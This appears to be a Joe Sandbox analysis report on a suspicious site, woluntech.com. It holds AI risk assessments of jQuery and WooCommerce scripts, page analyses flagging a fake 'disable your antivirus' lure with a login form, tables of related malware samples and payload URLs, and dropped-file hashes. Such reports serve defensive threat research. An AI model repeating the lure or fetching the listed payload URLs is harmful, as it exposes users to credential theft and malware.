JSON.parse"),o(s,"holdReady",s.holdReady,"jQuery.holdReady is deprecated"),o(s,"unique",s.uniqueSort,"jQuery.unique is deprecated; use jQuery.uniqueSort"),t(s.expr,"filters",s.expr.pseudos,"jQuery.expr.filters is deprecated; use jQuery.expr.pseudos"),t(s.expr,":",s.expr.pseudos,"jQuery.expr[':'] is deprecated; use jQuery.expr.pseudos"),e("3.1.1")&&o(s,"trim",function(e){return null==e?"":(e+"").replace(m,"")},"jQuery.trim is deprecated; use String.prototype.trim"),e("3.2.0")&&(o(s,"nodeName",function(e,t){return e.nodeName&&e.nodeName.toLowerCase()===t.toLowerCase()},"jQuery.nodeName is deprecated"),o(s,"isArray",Array.isArray,"jQuery.isArray is deprecated; use Array.isArray")),e("3.3.0")&&(o(s,"isNumeric",function(e){var t=typeof e;return("number"==t\|\|"string"==t)&&!isNaN(e-parseFloat(e))},"jQuery.isNumeric() is deprecated"),s.each("Boolean Number String Function Array Date RegExp Object Error Symbol".split(" "),function(e,t){d["[object "+t+"]"]=t.toLowerCase()}),o(s,"type",function(e){return null==e?e+"":"object"==typeof e\|\|"function"==typeof e?d[Object.prototype.toString.call(e)]\|\|"object":typeof e},"jQuery.type is deprecated"),o(s,"isFunction",function(e){return"function"==typeof e},"jQuery.isFunction() is deprecated"),o(s,"isWindow",function(e){return null!=e&&e===e.window},"jQuery.isWindow() is deprecated")),s.ajax&&(a=s.ajax,c=/(=)\?(?=&\|$)\|\?\?/,s.a
URL: https://www.woluntech.com/wp-content/plugins/wooco... Model: Joe Sandbox AI	{ "risk_score": 3, "reasoning": "The provided JavaScript snippet appears to be a part of the WooCommerce plugin for WordPress, which is a widely used and trusted e-commerce platform. The code handles the functionality of adding and removing items from the shopping cart, as well as updating the cart fragments. While the code uses some dynamic techniques like `eval` and `XHR`, these are common practices in modern web development and are not inherently malicious in this context. The code also includes several safeguards and event handlers to ensure the proper functioning of the cart and to prevent potential abuse. Overall, the risk score is low, as the code is likely part of a legitimate and widely-used plugin." }
jQuery(function(d){if("undefined"==typeof wc_add_to_cart_params)return!1;var t=function(){this.requests=[],this.addRequest=this.addRequest.bind(this),this.run=this.run.bind(this),d(document.body).on("click",".add_to_cart_button",{addToCartHandler:this},this.onAddToCart).on("click",".remove_from_cart_button",{addToCartHandler:this},this.onRemoveFromCart).on("added_to_cart",this.updateButton).on("ajax_request_not_sent.adding_to_cart",this.updateButton).on("added_to_cart removed_from_cart",{addToCartHandler:this},this.updateFragments)};t.prototype.addRequest=function(t){this.requests.push(t),1===this.requests.length&&this.run()},t.prototype.run=function(){var t=this,a=t.requests[0].complete;t.requests[0].complete=function(){"function"==typeof a&&a(),t.requests.shift(),0<t.requests.length&&t.run()},d.ajax(this.requests[0])},t.prototype.onAddToCart=function(t){var a=d(this);if(a.is(".ajax_add_to_cart")){if(!a.attr("data-product_id"))return!0;if(t.preventDefault(),a.removeClass("added"),a.addClass("loading"),!1===d(document.body).triggerHandler("should_send_ajax_request.adding_to_cart",[a]))return d(document.body).trigger("ajax_request_not_sent.adding_to_cart",[!1,!1,a]),!0;var e={};d.each(a.data(),function(t,a){e[t]=a}),d.each(a[0].dataset,function(t,a){e[t]=a}),d(document.body).trigger("adding_to_cart",[a,e]),t.data.addToCartHandler.addRequest({type:"POST",url:wc_add_to_cart_params.wc_ajax_url.toString().replace("%%endpoint%%","add_to_cart"),data:e,success:function(t){t&&(t.error&&t.product_url?window.location=t.product_url:"yes"!==wc_add_to_cart_params.cart_redirect_after_add?d(document.body).trigger("added_to_cart",[t.fragments,t.cart_hash,a]):window.location=wc_add_to_cart_params.cart_url)},dataType:"json"})}},t.prototype.onRemoveFromCart=function(t){var a=d(this),e=a.closest(".woocommerce-mini-cart-item");t.preventDefault(),e.block({message:null,overlayCSS:{opacity:.6}}),t.data.addToCartHandler.addRequest({type:"POST",url:wc_add_to_cart_params.wc_ajax_url.toString().replace("%%endpoint%%","remove_from_cart"),data:{cart_item_key:a.data("cart_item_key")},success:function(t){t&&t.fragments?d(document.body).trigger("removed_from_cart",[t.fragments,t.cart_hash,a]):window.location=a.attr("href")},error:function(){window.location=a.attr("href")},dataType:"json"})},t.prototype.updateButton=function(t,a,e,r){(r=void 0!==r&&r)&&(r.removeClass("loading"),a&&r.addClass("added"),a&&!wc_add_to_cart_params.is_cart&&0===r.parent().find(".added_to_cart").length&&r.after('<a href="'+wc_add_to_cart_params.cart_url+'" class="added_to_cart wc-forward" title="'+wc_add_to_cart_params.i18n_view_cart+'">'+wc_add_to_cart_params.i18n_view_cart+"</a>"),d(document.body).trigger("wc_cart_button_updated",[r]))},t.prototype.updateFragments=function(t,a){a&&(d.each(a,function(t){d(t).addClass("updating").fadeTo("400","0.6").block({message:null,overlayCSS:{opacity:.6}})}),d.each(a,function(t,a){d(t).replaceWith(a),d(t).stop(!0).css("opacity","1").unblock()}),d(document.body).trigger("wc_fragments_loaded"))},new t});
URL: PDF document Model: Joe Sandbox AI	{ "contains_trigger_text": true, "trigger_text": "Your antivirus software or firewall is blocking access to some secure PDF documents. Please temporarily disable your antivirus software to download the files again.", "prominent_button_name": "unknown", "text_input_field_labels": "unknown", "pdf_icon_visible": true, "has_visible_captcha": false, "has_urgent_text": true, "has_visible_qrcode": false, "contains_chinese_text": false, "contains_fake_security_alerts": true }

URL: PDF document Model: Joe Sandbox AI	{ "brands": "unknown" }
	{ "brands": "unknown" }
URL: https://www.woluntech.com/wp-includes/js/jquery/jq... Model: Joe Sandbox AI	```json { "risk_score": 1, "reasoning": "The provided JavaScript snippet is a part of the jQuery library, which is a widely used and reputable open-source library for DOM manipulation and event handling. The code does not exhibit any high-risk or moderate-risk behaviors such as dynamic code execution, data exfiltration, or redirects to suspicious domains. It primarily consists of utility functions and object manipulations typical of a library. There are no interactions with external domains or obfuscated code present. Therefore, it is considered low risk." }
/! jQuery v3.6.0 \| (c) OpenJS Foundation and other contributors \| jquery.org/license / !function(e,t){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Error("jQuery requires a window with a document");return t(e)}:t(e)}("undefined"!=typeof window?window:this,function(C,e){"use strict";var t=[],r=Object.getPrototypeOf,s=t.slice,g=t.flat?function(e){return t.flat.call(e)}:function(e){return t.concat.apply([],e)},u=t.push,i=t.indexOf,n={},o=n.toString,v=n.hasOwnProperty,a=v.toString,l=a.call(Object),y={},m=function(e){return"function"==typeof e&&"number"!=typeof e.nodeType&&"function"!=typeof e.item},x=function(e){return null!=e&&e===e.window},E=C.document,c={type:!0,src:!0,nonce:!0,noModule:!0};function b(e,t,n){var r,i,o=(n=n\|\|E).createElement("script");if(o.text=e,t)for(r in c)(i=t[r]\|\|t.getAttribute&&t.getAttribute(r))&&o.setAttribute(r,i);n.head.appendChild(o).parentNode.removeChild(o)}function w(e){return null==e?e+"":"object"==typeof e\|\|"function"==typeof e?n[o.call(e)]\|\|"object":typeof e}var f="3.6.0",S=function(e,t){return new S.fn.init(e,t)};function p(e){var t=!!e&&"length"in e&&e.length,n=w(e);return!m(e)&&!x(e)&&("array"===n\|\|0===t\|\|"number"==typeof t&&0<t&&t-1 in e)}S.fn=S.prototype={jquery:f,constructor:S,length:0,toArray:function(){return s.call(this)},get:function(e){return null==e?s.call(this):e<0?this[e+this.length]:this[e]},pushStack:function(e){var t=S.merge(this.constructor(),e);return t.prevObject=this,t},each:function(e){return S.each(this,e)},map:function(n){return this.pushStack(S.map(this,function(e,t){return n.call(e,t,e)}))},slice:function(){return this.pushStack(s.apply(this,arguments))},first:function(){return this.eq(0)},last:function(){return this.eq(-1)},even:function(){return this.pushStack(S.grep(this,function(e,t){return(t+1)%2}))},odd:function(){return this.pushStack(S.grep(this,function(e,t){return t%2}))},eq:function(e){var t=this.length,n=+e+(e<0?t:0);return this.pushStack(0<=n&&n<t?[this[n]]:[])},end:function(){return this.prevObject\|\|this.constructor()},push:u,sort:t.sort,splice:t.splice},S.extend=S.fn.extend=function(){var e,t,n,r,i,o,a=arguments[0]\|\|{},s=1,u=arguments.length,l=!1;for("boolean"==typeof a&&(l=a,a=arguments[s]\|\|{},s++),"object"==typeof a\|\|m(a)\|\|(a={}),s===u&&(a=this,s--);s<u;s++)if(null!=(e=arguments[s]))for(t in e)r=e[t],"__proto__"!==t&&a!==r&&(l&&r&&(S.isPlainObject(r)\|\|(i=Array.isArray(r)))?(n=a[t],o=i&&!Array.isArray(n)?[]:i\|\|S.isPlainObject(n)?n:{},i=!1,a[t]=S.extend(l,o,r)):void 0!==r&&(a[t]=r));return a},S.extend({expando:"jQuery"+(f+Math.random()).replace(/\D/g,""),isReady:!0,error:function(e){throw new Error(e)},noop:function(){},isPlainObject:function(e){var t,n;return!(!e\|\|"[object Object]"!==o.call(e))&&(!(t=r(e))\|\|"function"==typeof(n=v.call(t,"constructor")&&t.constructor)&&a.call(n)===l)},isEmptyObject:function(e){var t;for(t in e)return!1;return!0},globalEval:function(e,t,n){b(e,{nonce:t&&t.nonce},n)},each:function(e,t){var n,r=0;if(p(e)){for(n=e.length;r<n;r++)if(!1===t.call(e[r],r,e[r]))break}else for(r in e)if(!1===t.call(e[r],r,e[r]))break;return e},makeArray:function(e,t){var n=t\|\|[];return null!=e&&(p(Object(e))?S.merge(n,"string"==typeof e?[e]:e):u.call(n,e)),n},inArray:function(e,t,n){return null==t?-1:i.call(t,e,n)},merge:function(e,t){for(var n=+t.length,r=0,i=e.length;r<n;r++)e[i++]=t[r];return e.length=i,e},grep:function(e,t,n){for(var r=[],i=0,o=e.length,a=!n;i<o;i++)!t(e[i],i)!==a&&r.push(e[i]);return r},map:function(e,t,n){var r,i,o=0,a=[];if(p(e))for(r=e.length;o<r;o++)null!=(i=t(e[o],o,n))&&a.push(i);else for(o in e)null!=(i=t(e[o],o,n))&&a.push(i);return g(a)},guid:1,support:y}),"function"==typeof Symbol&&(S.fn[Symbol.iterator]=t[Symbol.iterator]),S.each("Boolean Number String Function Array Date RegExp Object Error Symbol".split(" "),function(e,t){n["[object "+t+"]"]=t.toLowerCase()});var d=function(n){var e,d,b,o,i,h,f,g,w,u,l,T,C,a,E,v,s,c,y,S="s
URL: https://www.woluntech.com/oders-pdf/ Model: Joe Sandbox AI	{ "contains_trigger_text": true, "trigger_text": "Your antivirus is preventing access to a secure PDF document. Disable your antivirus, then try again.", "prominent_button_name": "DOWNLOAD", "text_input_field_labels": [ "bhcoar@aiwtsmt.net", "********" ], "pdf_icon_visible": true, "has_visible_captcha": false, "has_urgent_text": true, "has_visible_qrcode": false, "contains_chinese_text": false, "contains_fake_security_alerts": false }

URL: https://www.woluntech.com Model: Joe Sandbox AI	{ "typosquatting": false, "unusual_query_string": false, "suspicious_tld": false, "ip_in_url": false, "long_subdomain": false, "malicious_keywords": false, "encoded_characters": false, "redirection": false, "contains_email_address": false, "known_domain": false, "brand_spoofing_attempt": false, "third_party_hosting": false }
URL: https://www.woluntech.com
URL: https://www.woluntech.com/oders-pdf/ Model: Joe Sandbox AI	{ "brands": "unknown" }
	{ "brands": "unknown" }

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
38.54.26.75	SecuriteInfo.com.Win32.TrojanX-gen.16449.26967.exe	Get hash	malicious	Unknown	Browse	collect-v6.51.la/v6/collect?dt=4
185.199.109.133	cr_asm3.ps1	Get hash	malicious	Unknown	Browse	raw.githubusercontent.com/Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber.txt
	gabe.ps1	Get hash	malicious	Unknown	Browse	raw.githubusercontent.com/Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber.txt
	5UIy3bo46y.dll	Get hash	malicious	Unknown	Browse	raw.githubusercontent.com/Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber.txt
	HQsitBLlOv.dll	Get hash	malicious	Unknown	Browse	raw.githubusercontent.com/Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber.txt
	steamcodegenerator.exe	Get hash	malicious	Unknown	Browse	raw.githubusercontent.com/Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber.txt
	OSLdZanXNc.exe	Get hash	malicious	Unknown	Browse	raw.githubusercontent.com/Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber.txt
	steamcodegenerator.exe	Get hash	malicious	Unknown	Browse	raw.githubusercontent.com/Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber.txt
	SecuriteInfo.com.Trojan.GenericKD.74126573.27896.28845.dll	Get hash	malicious	Metasploit	Browse	raw.githubusercontent.com/Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber_pyld.txt
	SecuriteInfo.com.Win64.MalwareX-gen.11827.5130.dll	Get hash	malicious	AsyncRAT, XWorm	Browse	raw.githubusercontent.com/Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber_pyld.txt
148.153.240.68	http://38133.xc.05cg.com/	Get hash	malicious	Unknown	Browse	collect-v6.51.la/v6/collect?dt=4
148.153.240.68	http://40608.xc.05cg.com/	Get hash	malicious	Unknown	Browse	collect-v6.51.la/v6/collect?dt=4
103.211.239.66	Disable_automatic_email_errors.exe	Get hash	malicious	AgentTesla	Browse
103.211.239.66	Amended_Po-1423300134.exe	Get hash	malicious	Unknown	Browse

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
raw.githubusercontent.com	https://www.xrmtoolbox.com/	Get hash	malicious	Unknown	Browse	185.199.108.133
	https://link.mail.beehiiv.com/ss/c/u001.dSnm3kaGd0BkNqLYPjeMfxWXllAYaBQ5sAn4OVD0j89GQGPZtwQlLugE_8c0wQMKfkpy5_wJ66BvE1Ognfzf5MlQMAeZ1qYs5mgwUBu3TAc6279Q43ISHz-HkVRC08yeDA4QvKWsqLTI1us9a0eXx18qeAibsZhjMMPvES-iG2zoVABKcwKIVWyx95VTVcFMSh6AEN3OCUfP_rXFvjKRbIPMuhn_dqYr8yUBKJvhhlJR9FhTpZPAULxzMbsYWp8k/4cu/JfECY1HwRl-ipvrNOktVcw/h23/h001.ibQl2N4tDD79TTzErix_sFWEGLTTuM6dTVMrTg3y5Dk	Get hash	malicious	Unknown	Browse	185.199.110.133
	sZSXKXOnBw.exe	Get hash	malicious	Unknown	Browse	185.199.111.133
	sZSXKXOnBw.exe	Get hash	malicious	Unknown	Browse	185.199.110.133
	http://trustwallet.secure-configure.com/trst.php	Get hash	malicious	Unknown	Browse	185.199.109.133
	https://trustwallet.secure-configure.com/trst.php/	Get hash	malicious	Unknown	Browse	185.199.110.133
	HTTPS://RAW.GITHUBUSERCONTENT.COM/wINPARwINPAR/DUCKYSCRIPTS/MAIN/nOeSCAPE.EXE	Get hash	malicious	Unknown	Browse	185.199.111.133
	z.bat	Get hash	malicious	Abobus Obfuscator, Braodo	Browse	185.199.111.133
	h.bat	Get hash	malicious	Abobus Obfuscator, Braodo	Browse	185.199.110.133
	spreadmalware.exe	Get hash	malicious	XWorm	Browse	185.199.110.133
github.com	https://microsoft-visio.en.softonic.com/	Get hash	malicious	Unknown	Browse	140.82.121.3
	https://www.xrmtoolbox.com/	Get hash	malicious	Unknown	Browse	140.82.121.4
	https://github.com/MscrmTools/XrmToolBox/releases/download/v1.2024.9.69/XrmToolbox.zip	Get hash	malicious	Unknown	Browse	140.82.112.4
	https://github.com/MscrmTools/XrmToolBox/releases/download/v1.2024.9.69/XrmToolbox.zip	Get hash	malicious	Unknown	Browse	140.82.121.3
	https://github.com/MscrmTools/XrmToolBox/releases/download/v1.2024.9.69/XrmToolbox.zip	Get hash	malicious	Unknown	Browse	140.82.121.3
	https://link.mail.beehiiv.com/ss/c/u001.dSnm3kaGd0BkNqLYPjeMfxWXllAYaBQ5sAn4OVD0j89GQGPZtwQlLugE_8c0wQMKfkpy5_wJ66BvE1Ognfzf5MlQMAeZ1qYs5mgwUBu3TAc6279Q43ISHz-HkVRC08yeDA4QvKWsqLTI1us9a0eXx18qeAibsZhjMMPvES-iG2zoVABKcwKIVWyx95VTVcFMSh6AEN3OCUfP_rXFvjKRbIPMuhn_dqYr8yUBKJvhhlJR9FhTpZPAULxzMbsYWp8k/4cu/JfECY1HwRl-ipvrNOktVcw/h23/h001.ibQl2N4tDD79TTzErix_sFWEGLTTuM6dTVMrTg3y5Dk	Get hash	malicious	Unknown	Browse	140.82.121.3
	https://github.com/netwrix/pingcastle/releases/download/3.3.0.1/PingCastle_3.3.0.1.zip	Get hash	malicious	Unknown	Browse	140.82.121.4
	chrtrome22.exe	Get hash	malicious	Xmrig	Browse	140.82.121.4
	pTVKHqys2h.exe	Get hash	malicious	Xmrig	Browse	140.82.121.4
	z.bat	Get hash	malicious	Abobus Obfuscator, Braodo	Browse	140.82.121.4
bg.microsoft.map.fastly.net	wmnq39xe8J.dll	Get hash	malicious	Wannacry	Browse	199.232.214.172
	Final-Agreement-Document#808977735.pdf	Get hash	malicious	HTMLPhisher	Browse	199.232.210.172
	tTbeoLWNhb.dll	Get hash	malicious	Wannacry	Browse	199.232.214.172
	Document-01-16-25.pdf	Get hash	malicious	Unknown	Browse	199.232.210.172
	Eastern Contractors Corporation Contract and submittal document.eml	Get hash	malicious	Unknown	Browse	199.232.214.172
	v9xYj92wR3.dll	Get hash	malicious	Wannacry	Browse	199.232.214.172
	https://securityalert-corporate.com/click/f288bff9-842d-4e34-8d2d-41ad20e48e9d	Get hash	malicious	Unknown	Browse	199.232.214.172
	FjSrGs0AE2.dll	Get hash	malicious	Wannacry	Browse	199.232.214.172
	jgd5ZGl1vA.dll	Get hash	malicious	Wannacry	Browse	199.232.214.172
	logitix.pdf	Get hash	malicious	HTMLPhisher	Browse	199.232.214.172
hcdnwsa120.v5.cdnhwczoy106.cn	https://imtcoken.im/	Get hash	malicious	Unknown	Browse	98.98.25.19
	http://www.toekan.im/	Get hash	malicious	Unknown	Browse	148.153.240.68
	https://wap.sunblock-pro.com/	Get hash	malicious	Unknown	Browse	90.84.161.16
	http://m.escritoresunidos.com/	Get hash	malicious	Unknown	Browse	199.91.74.209
	https://www.xietaoz.com/	Get hash	malicious	Unknown	Browse	199.91.74.185
	http://wap.escritoresunidos.com/	Get hash	malicious	Unknown	Browse	90.84.161.20
	http://www.telegramai.org/	Get hash	malicious	Unknown	Browse	90.84.161.20
	http://www.telegramwg.com/	Get hash	malicious	Unknown	Browse	90.84.161.20
	https://aqctslc.com/	Get hash	malicious	Unknown	Browse	199.91.74.185
	http://38133.xc.05cg.com/	Get hash	malicious	Unknown	Browse	90.84.161.16

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
FASTLYUS	Final-Agreement-Document#808977735.pdf	Get hash	malicious	HTMLPhisher	Browse	151.101.194.137
	https://cc68b94d-d9d0-4a03-bf37-d58a3335e1ce.p.reviewstudio.com/-/en/Computer-Zubehoer/b/?ie=UTF8&node=340843031&ref_=nav_cs_pc	Get hash	malicious	Unknown	Browse	151.101.65.16
	https://cc68b94d-d9d0-4a03-bf37-d58a3335e1ce.p.reviewstudio.com/-/en/b/?_encoding=UTF8&_encoding=UTF8&node=3024314031&bbn=16435051&pd_rd_w=VSdHJ&content-id=amzn1.sym.01fcb23a-92a2-4260-b9bf-7c78abf408da&pf_rd_p=01fcb23a-92a2-4260-b9bf-7c78abf408da&pf_rd_r=E0WD16QK99B55VAWSKBQ&pd_rd_wg=EU3Lj&pd_rd_r=fd3510c2-a6e6-4f59-a468-c59aac80bfa9&ref_=pd_hp_d_btf_unk	Get hash	malicious	Unknown	Browse	151.101.129.16
	https://cc68b94d-d9d0-4a03-bf37-d58a3335e1ce.p.reviewstudio.com/-/en/NYNY25/?_encoding=UTF8&pd_rd_w=WqHp4&content-id=amzn1.sym.33dfa5bb-d117-4590-a21d-8b7be5a7ab9d&pf_rd_p=33dfa5bb-d117-4590-a21d-8b7be5a7ab9d&pf_rd_r=E0WD16QK99B55VAWSKBQ&pd_rd_wg=EU3Lj&pd_rd_r=fd3510c2-a6e6-4f59-a468-c59aac80bfa9&ref_=pd_hp_d_btf_unk	Get hash	malicious	Unknown	Browse	151.101.65.16
	https://ziyahid.github.io/netflix-clone	Get hash	malicious	HTMLPhisher	Browse	185.199.108.153
	https://tvtsrilanka.com/Agrr/	Get hash	malicious	Unknown	Browse	151.101.129.229
	http://metapromation.vercel.app/pagez/	Get hash	malicious	Unknown	Browse	151.101.129.229
	https://sreamconmymnltty.com/scerty/bliun/bolop	Get hash	malicious	Unknown	Browse	199.232.192.193
	http://fbmatrixgrowth-zeta.vercel.app/pagez/	Get hash	malicious	Unknown	Browse	151.101.65.229
	https://yolocdh.weebly.com/	Get hash	malicious	HTMLPhisher	Browse	151.101.1.46
COGENT-174US	S8LDvVdtOk.dll	Get hash	malicious	Wannacry	Browse	38.189.152.1
	xjljKPlxqO.dll	Get hash	malicious	Wannacry	Browse	206.238.32.1
	http://iuyhrgjyujliyhgdhtyhuggdchrtgfdhfhtjh.b-cdn.net/	Get hash	malicious	Unknown	Browse	143.244.60.193
	v9xYj92wR3.dll	Get hash	malicious	Wannacry	Browse	38.1.235.120
	mlfk8sYaiy.dll	Get hash	malicious	Wannacry	Browse	38.251.3.58
	Fantazy.arm4.elf	Get hash	malicious	Unknown	Browse	38.4.250.205
	meth8.elf	Get hash	malicious	Mirai	Browse	38.162.241.67
	meth1.elf	Get hash	malicious	Mirai	Browse	38.177.19.121
	arm4.elf	Get hash	malicious	Unknown	Browse	154.18.45.127
	ppc.elf	Get hash	malicious	Unknown	Browse	38.253.160.113
CDSC-AS1US	meth15.elf	Get hash	malicious	Mirai	Browse	164.52.64.103
	http://www.toekan.im/	Get hash	malicious	Unknown	Browse	148.153.240.68
	https://wap.sunblock-pro.com/	Get hash	malicious	Unknown	Browse	148.153.240.68
	https://hmflowcontrols.com/ch/CHFINAL/50477/	Get hash	malicious	Unknown	Browse	148.153.240.72
	http://www.telegramstg.com/	Get hash	malicious	Unknown	Browse	148.153.240.68
	http://www.telegramii.org/	Get hash	malicious	Unknown	Browse	148.153.240.68
	https://whatsapp-cy.com/	Get hash	malicious	Unknown	Browse	148.153.240.68
	https://mrohailkhan.com/energyaustralia/auth/auhs1/	Get hash	malicious	Unknown	Browse	148.153.240.72
	https://aqctslc.com/	Get hash	malicious	Unknown	Browse	148.153.240.68
	https://199.188.109.181	Get hash	malicious	Unknown	Browse	148.153.240.71
NETONBOARD-MYNetOnboardSdnBhd-QualityReliableCloud	https://cadtutorial.org	Get hash	malicious	Unknown	Browse	103.211.239.20
	Disable_automatic_email_errors.exe	Get hash	malicious	AgentTesla	Browse	103.211.239.66
	Amended_Po-1423300134.exe	Get hash	malicious	Unknown	Browse	103.211.239.66
	PO-21004-1-Ind Expert.doc	Get hash	malicious	Unknown	Browse	43.252.37.193
	PAYMENT DETAILS .doc	Get hash	malicious	Unknown	Browse	43.252.37.193
	Revised Purchase Order 1214.doc	Get hash	malicious	AgentTesla	Browse	43.252.37.193
	INQUIRY_RFQ_20210208.doc	Get hash	malicious	AgentTesla	Browse	43.252.37.193
	Request- NAVALTECH.doc	Get hash	malicious	AgentTesla	Browse	43.252.37.193
	Quotation-20441.doc	Get hash	malicious	AgentTesla	Browse	43.252.37.193
	PROFORMA INVOICE-09765434.doc	Get hash	malicious	AgentTesla	Browse	43.252.37.193

JA3 Fingerprints

⊘No context

Dropped Files

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link
C:\Users\user\AppData\Local\Temp\giv5wpek.rbk\Chrom.exe	Quote for new order 2025.exe	Get hash	malicious	Unknown	Browse
	Quote for new order 2025.exe	Get hash	malicious	Unknown	Browse
	#U0417#U0430#U043f#U0440#U043e#U0441 #U041a#U041f.docx.scr	Get hash	malicious	Unknown	Browse
	curriculum_vitae-copie.vbs	Get hash	malicious	Xmrig	Browse
	curriculum_vitae-copie_(1).vbs	Get hash	malicious	Xmrig	Browse
	curriculum_vitae-copie.vbs	Get hash	malicious	Xmrig	Browse
	UDO_Device_Enrolment.exe	Get hash	malicious	Unknown	Browse

Process:	C:\Users\user\AppData\Local\Temp\giv5wpek.rbk\Reversed order 24-25.exe
File Type:	JPEG image data, JFIF standard 1.01, resolution (DPI), density 96x96, segment length 16, baseline, precision 8, 1280x1024, components 3
Category:	dropped
Size (bytes):	50827
Entropy (8bit):	7.163569933449973
Encrypted:	false
SSDEEP:	768:CTxfCdb58SSSSSSSSSS1+0jAVryamh9S9GmCU7LOym+ZVnT:CNQ5WzAVryamvfmCU7LOyBZVnT
MD5:	252090C29C69EB2DB4436D2151F4875A
SHA1:	743B4470FE12D87F686833B6B0AC47400EE67198
SHA-256:	10D82D69C07EE5F62FA2D229FC39C158235E570F588234719E8FBD0A31560353
SHA-512:	4F9F51349F574BEFDD9C1F4FEF4F3E2A57B38DFE782303B5730FF8E22E59C53FC8C4D347E6428D679F534D434C11B865C9E92E0661AD7C9D590D97F7D98B332C
Malicious:	false
Preview:	......JFIF.....`.`.....C................................... $.' ",#..(7),01444.'9=82<.342...C...........2!.!22222222222222222222222222222222222222222222222222..........."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?...(..AEgkz..N..,Fi.u..........\^...{@..e....$..j.$S.7...=.........Gz...RD........_g..-...).9..#>}..?...ES..&.I.8....G.6P7~.g.6.`.m..P.\.h..p. z.'.z...Ec...X!....7^Ts..6...........n..a.,2.......c.P..U..[I.....3..M..c+...W....(...(...(...(...(...(...(...(....j.X<..$.I..Om.h.. .y.gH_a..+..O\|P..2...c.c\.........1..U+Y.K........]6'+4..QQIs.>g.4i.......}...j

Process:	C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	292
Entropy (8bit):	5.251167509215276
Encrypted:	false
SSDEEP:	6:iO8HWT+DSN+q2Pwkn2nKuAl9OmbnIFUtWHWT+LDJmWZmwoHWT+LDJNVkwOwkn2nC:70WT+Di+vYfHAahFUteWT+LlmW/4WT+o
MD5:	58D220270D6E307F8E99E0942DFF7FF3
SHA1:	B2984462CB9507369E5C3A175073A557367D4BCA
SHA-256:	1145324756C8EEDCBCE57DA0C9FA1C733B97D6EC8C0A86CC81CA4550CEC06CD5
SHA-512:	DC49CB637A65791A89F8BBA99F1B0DE61DF60E117ED6FF8C8540B8653545324D740EBD3AFC2E1AC5BA22787CC6CE67ED04C0A8A038440E6D20BBA74DADA3F21A
Malicious:	false
Preview:	2025/01/14-21:36:31.586 1f5c Reusing MANIFEST C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache/MANIFEST-000001.2025/01/14-21:36:31.589 1f5c Recovering log #3.2025/01/14-21:36:31.589 1f5c Reusing old log C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache/000003.log .

Process:	C:\Windows\SysWOW64\7za.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	543744
Entropy (8bit):	6.9942456354156635
Encrypted:	false
SSDEEP:
MD5:	B7DE28D4862B78D70CC0E6234049B842
SHA1:	7E96F57345C6EBB0CC745A91CEE6AA630CE3E7EE
SHA-256:	59C673A77402AFA5320BF492CD3E6EAF0DC81EA0FC3EE2E716C88F011E717E58
SHA-512:	F4A16AEBDAAF1A87A16CBEB5408DAF59A59D2175BFFDF073504FA67337A6952C809DC2082A6D128D567D120487170B684AC2A650918618118DD81BF87F3058CE
Malicious:	true
Yara Hits:	Rule: JoeSecurity_WebBrowserPassView, Description: Yara detected WebBrowserPassView password recovery tool, Source: C:\Users\user\AppData\Local\Temp\giv5wpek.rbk\Reversed order 24-25.exe, Author: Joe Security
Antivirus:	Antivirus: ReversingLabs, Detection: 66%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L................."...P.............V.... ........@.. ....................................`.....................................O..................................h...8............................................ ............... ..H............text...\.... ...................... ..`.rsrc..............................@..@.reloc...............J..............@..B................8.......H.......x^...G..........p....%...........................................0............(....(..........(.....o..........................( ......(!......("......(#......($....N..(....oN...(%......0.............(&......('....+..&..((.....s)........s........s+........s,........s-..........0...........~....o.....+...0...........~....o/....+...0...........~....o0....+...0...........~....o1....+...0...........~....o2....+...0..<........~.....(3.....,!r...p.....(4...o5...

Process:	C:\Windows\SysWOW64\unarchiver.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	1482
Entropy (8bit):	5.164086233491129
Encrypted:	false
SSDEEP:
MD5:	1F3F35B44D47FD7CBCD3C366C57C4E8D
SHA1:	DC0B64814702573E00AB69BDF2035E68D2E84401
SHA-256:	53EE7225E88E69A6BA0DC892F74FA45D9EB36AED81D85BB5CDF360C46F478071
SHA-512:	3FE569150E013E3E7A5B77EB9A9C59538B36C2CCA01B3445814E26248C8A3ED0C664F0A3C6FCC31806589681FE091A3BB2A7FB83F157AA942E4D6FB55C063A5C
Malicious:	false
